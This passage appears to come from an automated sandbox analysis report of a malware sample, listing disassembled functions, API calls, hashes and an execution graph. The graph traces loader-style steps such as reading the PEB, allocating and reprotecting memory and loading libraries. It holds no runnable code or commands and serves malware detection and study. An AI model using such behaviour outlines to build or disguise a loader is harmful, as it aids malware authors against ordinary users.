                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: <(@
                                                                                                                                                                                                                                • API String ID: 1452528299-4189137628
                                                                                                                                                                                                                                • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                • String ID: <(@$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 4194217158-2207043977
                                                                                                                                                                                                                                • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                                • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                • API String ID: 1687795959-2046700901
                                                                                                                                                                                                                                • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                                • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_catch
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                                                                                                                                                                                  • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                                                                                                                                                                                  • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                                                                                                                                                                                  • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                                                                                                                                                                                  • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                • String ID: F@
                                                                                                                                                                                                                                • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                • Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                                • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
                                                                                                                                                                                                                                  • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Access violation - no RTTI data!, xrefs: 00428D6A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                • Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                                • Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                • String ID: jB$nB
                                                                                                                                                                                                                                • API String ID: 3275300208-1818383504
                                                                                                                                                                                                                                • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pThreadProxy
                                                                                                                                                                                                                                • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                                • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                                                                                • String ID: %w
                                                                                                                                                                                                                                • API String ID: 3253501508-3265503460
                                                                                                                                                                                                                                • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02142AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02142AA3,00000000), ref: 0216B177
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0216B185
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02142AA3,00000000), ref: 0216B1E0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                • Instruction ID: f3406793a83f8caa5fb82baf667cda0b6b8305d8cdd766babfcfaa2bf5f80814
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B41D231688216AFCB258F64D84CBBE7BB5EF01329F15416CE859F71A0DB30AB61CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0042AF1E
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:1.5%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:33.3%
                                                                                                                                                                                                                                Signature Coverage:11.8%
                                                                                                                                                                                                                                Total number of Nodes:93
                                                                                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                                                                                execution_graph 26178 408880 26179 40888f 26178->26179 26180 408ab5 ExitProcess 26179->26180 26181 4088a4 GetCurrentProcessId GetCurrentThreadId 26179->26181 26186 4089cf 26179->26186 26182 4088ca 26181->26182 26183 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26181->26183 26182->26183 26184 408974 26183->26184 26187 43eb20 26184->26187 26186->26180 26190 441850 26187->26190 26189 43eb2a RtlAllocateHeap 26189->26186 26191 441870 26190->26191 26191->26189 26191->26191 26212 40ab12 26213 40ab22 26212->26213 26214 40ab3d WSAStartup 26213->26214 26215 443190 26217 4431b0 26215->26217 26216 443298 26217->26216 26219 4402c0 LdrInitializeThunk 26217->26219 26219->26216 26220 4434d0 26221 44350f 26220->26221 26222 4434e9 26220->26222 26222->26221 26226 4402c0 LdrInitializeThunk 26222->26226 26224 443538 26224->26221 26227 4402c0 LdrInitializeThunk 26224->26227 26226->26224 26227->26221 26228 4404b1 GetForegroundWindow 26229 4404ce 26228->26229 26235 440cde 26236 440ce8 26235->26236 26238 440dae 26236->26238 26241 4402c0 LdrInitializeThunk 26236->26241 26240 4402c0 LdrInitializeThunk 26238->26240 26240->26238 26241->26238 26242 40a69b 26243 40a770 26242->26243 26243->26243 26248 40b2b0 26243->26248 26245 40a7b9 26246 40b2b0 3 API calls 26245->26246 26247 40a8d9 26246->26247 26251 40b340 26248->26251 26249 40b365 26249->26245 26251->26249 26252 440260 26251->26252 26253 4402a5 26252->26253 26254 440286 26252->26254 26255 440278 26252->26255 26256 44029a 26252->26256 26261 43eb40 26253->26261 26259 44028b RtlReAllocateHeap 26254->26259 26255->26253 26255->26254 26257 43eb20 RtlAllocateHeap 26256->26257 26260 4402a0 26257->26260 26259->26260 26260->26251 26262 43eb53 26261->26262 26263 43eb55 26261->26263 26262->26260 26264 43eb5a RtlFreeHeap 26263->26264 26264->26260 26265 4409b8 26266 4409d0 26265->26266 26266->26266 26268 440a3e 26266->26268 26271 4402c0 LdrInitializeThunk 26266->26271 26267 440a8e 26268->26267 26272 4402c0 LdrInitializeThunk 26268->26272 26271->26268 26272->26267 26273 580005 26278 58092b GetPEB 26273->26278 26275 580030 26279 58003c 26275->26279 26278->26275 26280 580049 26279->26280 26294 580e0f SetErrorMode SetErrorMode 26280->26294 26285 580265 26286 5802ce VirtualProtect 26285->26286 26288 58030b 26286->26288 26287 580439 VirtualFree 26292 5805f4 LoadLibraryA 26287->26292 26293 5804be 26287->26293 26288->26287 26289 5804e3 LoadLibraryA 26289->26293 26291 5808c7 26292->26291 26293->26289 26293->26292 26295 580223 26294->26295 26296 580d90 26295->26296 26297 580dad 26296->26297 26298 580dbb GetPEB 26297->26298 26299 580238 VirtualAlloc 26297->26299 26298->26299 26299->26285 26192 602fee 26193 602ffd 26192->26193 26196 60378e 26193->26196 26197 6037a9 26196->26197 26198 6037b2 CreateToolhelp32Snapshot 26197->26198 26199 6037ce Module32First 26197->26199 26198->26197 26198->26199 26200 603006 26199->26200 26201 6037dd 26199->26201 26203 60344d 26201->26203 26204 603478 26203->26204 26205 6034c1 26204->26205 26206 603489 VirtualAlloc 26204->26206 26205->26205 26206->26205 26207 4406eb 26208 44072e 26207->26208 26209 44070c 26207->26209 26209->26208 26211 4402c0 LdrInitializeThunk 26209->26211 26211->26208

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                • String ID: 6W01
                                                                                                                                                                                                                                • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 119 40b2b0-40b338 120 40b340-40b349 119->120 120->120 121 40b34b-40b35e 120->121 123 40b700-40b74a 121->123 124 40b661-40b6ab call 408040 121->124 125 40b6b4-40b6ff 121->125 126 40b365-40b367 121->126 127 40b658-40b65c 121->127 128 40b36c-40b5a5 121->128 138 40b750-40b757 123->138 124->125 125->123 129 40ba61-40ba67 126->129 131 40ba52-40ba5e 127->131 130 40b5b0-40b635 128->130 134 40ba70 129->134 130->130 135 40b63b-40b646 130->135 131->129 139 40b64a-40b651 135->139 138->134 140 40ba00 138->140 141 40b804-40b80b 138->141 142 40b904-40b908 138->142 143 40b7c5 138->143 144 40ba06-40ba0a 138->144 145 40ba49 138->145 146 40b7cb-40b7d1 138->146 147 40b80d-40b81f 138->147 148 40b90d-40b92d 138->148 149 40b94d-40b954 138->149 150 40b990-40b994 138->150 151 40ba11-40ba16 138->151 152 40b9d8-40b9f4 138->152 153 40b95b-40b970 call 441c40 138->153 154 40b8dc-40b8e6 138->154 155 40ba1d 138->155 156 40b75e-40b76c 138->156 157 40b7e0-40b7e6 138->157 158 40b7a0-40b7bd call 441c40 138->158 159 40ba23-40ba30 138->159 160 40b9a3-40b9b5 138->160 161 40b8ed-40b902 call 441c40 138->161 162 40b7ef-40b7fd 138->162 163 40b972-40b976 138->163 164 40ba72-40ba79 138->164 165 40b773 138->165 166 40b934-40b946 138->166 167 40ba35-40ba38 138->167 168 40b779-40b794 call 441c40 138->168 169 40b97b-40b984 138->169 170 40b9bc-40b9c2 call 440260 138->170 171 40b9fd-40b9ff 138->171 139->123 139->124 139->125 139->127 139->138 139->140 139->141 139->142 139->143 139->144 139->146 139->147 139->148 139->149 139->150 139->151 139->152 139->153 139->154 139->155 139->156 139->157 139->159 139->160 139->161 139->162 139->163 139->166 139->167 139->169 139->170 139->171 174 40b83c-40b867 141->174 177 40ba3f-40ba42 142->177 143->146 144->134 144->142 144->145 144->151 144->153 144->155 144->158 144->161 144->163 144->164 144->165 144->167 144->168 145->131 146->157 175 40b820-40b834 147->175 148->134 148->140 148->142 148->144 148->145 148->149 148->150 148->151 148->152 148->153 148->155 148->158 148->159 148->160 148->161 148->163 148->164 148->165 148->166 148->167 148->168 148->169 148->170 148->171 149->134 149->142 149->145 149->153 149->158 149->161 149->163 149->164 149->165 149->168 188 40b99d 150->188 151->134 151->142 151->145 151->153 151->155 151->158 151->161 151->163 151->164 151->165 151->167 151->168 152->171 153->163 154->134 154->142 154->145 154->158 154->161 154->164 154->165 154->168 156->134 156->145 156->158 156->164 156->165 156->168 157->162 158->143 159->150 160->134 160->140 160->142 160->144 160->145 160->151 160->152 160->153 160->155 160->158 160->161 160->163 160->164 160->165 160->167 160->168 160->170 160->171 161->142 162->134 162->140 162->141 162->142 162->144 162->145 162->147 162->148 162->149 162->150 162->151 162->152 162->153 162->154 162->155 162->158 162->159 162->160 162->161 162->163 162->164 162->165 162->166 162->167 162->168 162->169 162->170 162->171 163->167 166->134 166->140 166->142 166->144 166->145 166->149 166->150 166->151 166->152 166->153 166->155 166->158 166->159 166->160 166->161 166->163 166->164 166->165 166->167 166->168 166->169 166->170 166->171 167->177 168->158 169->150 191 40b9c7-40b9d1 170->191 171->140 190 40b870-40b8b6 174->190 175->175 189 40b836-40b839 175->189 177->145 188->160 189->174 190->190 192 40b8b8-40b8d5 190->192 191->134 191->140 191->142 191->144 191->145 191->151 191->152 191->153 191->155 191->158 191->161 191->163 191->164 191->165 191->167 191->168 191->171 192->134 192->140 192->142 192->144 192->145 192->148 192->149 192->150 192->151 192->152 192->153 192->154 192->155 192->158 192->159 192->160 192->161 192->163 192->164 192->165 192->166 192->167 192->168 192->169 192->170 192->171
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                                                                                                                                                • API String ID: 0-74227037
                                                                                                                                                                                                                                • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 271 40aa32-40aa35 272 40aa82 271->272 273 40aa37-40aa5f 271->273 274 40aa60-40aa72 273->274 274->274 275 40aa74-40aa7b 274->275 278 40aa00-40aa12 275->278 278->278 279 40aa14-40aa2e 278->279
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: MO$MO
                                                                                                                                                                                                                                • API String ID: 0-3148518880
                                                                                                                                                                                                                                • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 307 4402c0-4402f2 LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0044316E,00686628,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
